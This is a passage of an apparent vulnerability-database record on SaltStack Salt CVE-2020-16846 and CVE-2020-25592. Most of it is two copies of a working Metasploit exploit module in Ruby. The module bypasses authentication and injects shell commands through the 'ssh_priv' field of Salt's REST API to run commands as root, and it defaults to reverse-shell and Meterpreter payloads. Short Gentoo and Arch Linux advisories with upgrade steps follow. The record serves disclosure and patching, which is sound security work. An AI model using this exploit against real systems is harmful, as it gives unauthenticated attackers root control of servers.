bypass and command injection in 
\nSaltStack Salt's REST API to execute commands as the root user. \n \nThe following versions have received a patch: 2015.8.10, 2015.8.13, \n2016.3.4, 2016.3.6, 2016.3.8, 2016.11.3, 2016.11.6, 2016.11.10, \n2017.7.4, 2017.7.8, 2018.3.5, 2019.2.5, 2019.2.6, 3000.3, 3000.4, \n3001.1, 3001.2, and 3002. \n \nTested against 2019.2.3 from Vulhub and 3002 on Ubuntu 20.04.1. \n}, \n'Author' => [ \n'KPC', # CVE-2020-16846 (ZDI-CAN-11143) \n'wvu' # Exploit \n], \n'References' => [ \n['CVE', '2020-16846'], # Command injection \n['CVE', '2020-25592'], # Auth bypass \n['URL', 'https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/'] \n], \n'DisclosureDate' => '2020-11-03', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :bourne, \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(8000), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = execute_command('') \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \n# Server: CherryPy/18.6.0 \nunless res.headers['Server']&.match(%r{^CherryPy/[\\d.]+$}) \nreturn CheckCode::Unknown('Target does not appear to be running Salt.') \nend \n \n# {\"return\": [{}]} \nunless res.code == 200 && 
res.get_json_document['return'] == [{}] \nreturn CheckCode::Safe('Auth bypass failed.') \nend \n \nCheckCode::Vulnerable('Auth bypass successful.') \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager(background: true) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") unless cmd.empty? \n \n# https://docs.saltstack.com/en/latest/ref/netapi/all/salt.netapi.rest_cherrypy.html#post--run \n# https://github.com/saltstack/salt/pull/58871 \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'run'), \n'ctype' => 'application/json', \n'data' => { \n'client' => 'ssh', \n'tgt' => '*', \n'fun' => rand_text_alphanumeric(8..42), \n'eauth' => rand_text_alphanumeric(8..42), # Auth bypass \n'ssh_priv' => \"/dev/null < /dev/null; (#{cmd}) & #\" # Command injection \n}.to_json \n) \nend \n \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/160039/saltstack_salt_api_cmd_exec.rb.txt"}], "metasploit": [{"lastseen": "2021-01-20T16:49:08", "description": "This module exploits an authentication bypass and command injection in SaltStack Salt's REST API to execute commands as the root user. The following versions have received a patch: 2015.8.10, 2015.8.13, 2016.3.4, 2016.3.6, 2016.3.8, 2016.11.3, 2016.11.6, 2016.11.10, 2017.7.4, 2017.7.8, 2018.3.5, 2019.2.5, 2019.2.6, 3000.3, 3000.4, 3001.1, 3001.2, and 3002. 
Tested against 2019.2.3 from Vulhub and 3002 on Ubuntu 20.04.1.\n", "published": "2020-11-11T19:09:26", "type": "metasploit", "title": "SaltStack Salt REST API Arbitrary Command Execution", "bulletinFamily": "exploit", "cvelist": [], "modified": "2020-12-10T04:45:41", "id": "MSF:EXPLOIT/LINUX/HTTP/SALTSTACK_SALT_API_CMD_EXEC/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SaltStack Salt REST API Arbitrary Command Execution',\n 'Description' => %q{\n This module exploits an authentication bypass and command injection in\n SaltStack Salt's REST API to execute commands as the root user.\n\n The following versions have received a patch: 2015.8.10, 2015.8.13,\n 2016.3.4, 2016.3.6, 2016.3.8, 2016.11.3, 2016.11.6, 2016.11.10,\n 2017.7.4, 2017.7.8, 2018.3.5, 2019.2.5, 2019.2.6, 3000.3, 3000.4,\n 3001.1, 3001.2, and 3002.\n\n Tested against 2019.2.3 from Vulhub and 3002 on Ubuntu 20.04.1.\n },\n 'Author' => [\n 'KPC', # CVE-2020-16846 (ZDI-CAN-11143)\n 'wvu' # Exploit\n ],\n 'References' => [\n ['CVE', '2020-16846'], # Command injection\n ['CVE', '2020-25592'], # Auth bypass\n ['URL', 'https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/']\n ],\n 'DisclosureDate' => '2020-11-03', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 
'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :bourne,\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(8000),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n # /bin/sh -c 'ssh-keygen -P \"\" -f /dev/null < /dev/null & # -t rsa -q'\n res = send_request_cmd_inject('/dev/null < /dev/null & #')\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n # Server: CherryPy/18.6.0\n unless res.headers['Server']&.match(%r{^CherryPy/[\\d.]+$})\n return CheckCode::Unknown('Target does not appear to be running Salt.')\n end\n\n # {\"return\": [{}]}\n unless res.code == 200 && res.get_json_document['return'] == [{}]\n return CheckCode::Safe('Auth bypass failed.')\n end\n\n CheckCode::Vulnerable('Auth bypass successful.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager(background: true)\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n # Subshell and background our command injection\n send_request_cmd_inject(\"/dev/null < /dev/null & (#{cmd}) & #\")\n end\n\n def send_request_cmd_inject(cmd_inject)\n # https://docs.saltstack.com/en/latest/ref/netapi/all/salt.netapi.rest_cherrypy.html#post--run\n # https://github.com/saltstack/salt/pull/58871\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'run'),\n 'ctype' => 'application/json',\n 'data' => {\n 'client' => 'ssh',\n 'tgt' => '*',\n 'fun' => 
rand_text_alphanumeric(8..42),\n 'eauth' => rand_text_alphanumeric(8..42), # Auth bypass\n 'ssh_priv' => cmd_inject # Command injection\n }.to_json\n )\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/saltstack_salt_api_cmd_exec.rb"}], "gentoo": [{"lastseen": "2020-11-11T09:13:08", "bulletinFamily": "unix", "cvelist": ["CVE-2020-16846", "CVE-2020-25592", "CVE-2020-17490"], "description": "### Background\n\nSalt is a remote execution and configuration manager.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Salt. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nPlease review the referenced CVE identifiers for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Salt users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-admin/salt-3000.5\"", "edition": 1, "modified": "2020-11-11T00:00:00", "published": "2020-11-11T00:00:00", "id": "GLSA-202011-13", "href": "https://security.gentoo.org/glsa/202011-13", "title": "Salt: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 0.0, "vector": "NONE"}}], "archlinux": [{"lastseen": "2020-11-17T09:40:02", "bulletinFamily": "unix", "cvelist": ["CVE-2020-16846", "CVE-2020-17490", "CVE-2020-25592"], "description": "Arch Linux Security Advisory ASA-202011-7\n=========================================\n\nSeverity: Critical\nDate : 2020-11-10\nCVE-ID : CVE-2020-16846 CVE-2020-17490 CVE-2020-25592\nPackage : salt\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1262\n\nSummary\n=======\n\nThe package salt before version 2019.2.7-1 is vulnerable to multiple\nissues including arbitrary command execution and access restriction\nbypass.\n\nResolution\n==========\n\nUpgrade to 2019.2.7-1.\n\n# pacman -Syu \"salt>=2019.2.7-1\"\n\nThe 
problems have been fixed upstream in version 2019.2.7.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2020-16846 (arbitrary command execution)\n\nAn issue has been found in Salt before 3001.3, 3000.5, 2019.2.7 where\nan unauthenticated user with network access to the Salt API can use\nshell injections to run code on the Salt API using the SSH client.\n\n- CVE-2020-17490 (access restriction bypass)\n\nAn issue has been found in Salt before 3001.3, 3000.5, 2019.2.7 where,\nwhen using the functions create_ca, create_csr, and\ncreate_self_signed_cert in the tls execution module, it will not ensure\nthe key was created with the correct permissions.\n\n- CVE-2020-25592 (arbitrary command execution)\n\nAn issue has been found in Salt before 3001.3, 3000.5, 2019.2.7 where,\nwhen using the SSH client, an unauthenticated user can gain access to\nrun commands against targets set in a Salt-SSH roster.\n\nImpact\n======\n\nA remote, unauthenticated user with network access to the Salt API can\nexecute arbitrary commands.\n\nReferences\n==========\n\nhttps://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/\nhttps://gitlab.com/saltstack/open/salt-patches/-/blob/master/patches/2020/09/02/2019.2.x.patch\nhttps://gitlab.com/saltstack/open/salt-patches/-/blob/master/patches/2020/09/25/2019.2.6.patch\nhttps://security.archlinux.org/CVE-2020-16846\nhttps://security.archlinux.org/CVE-2020-17490\nhttps://security.archlinux.org/CVE-2020-25592", "modified": "2020-11-10T00:00:00", "published": "2020-11-10T00:00:00", "id": "ASA-202011-7", "href": "https://security.archlinux.org/ASA-202011-7", "type": "archlinux", "title": "[ASA-202011-7] salt: multiple issues", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}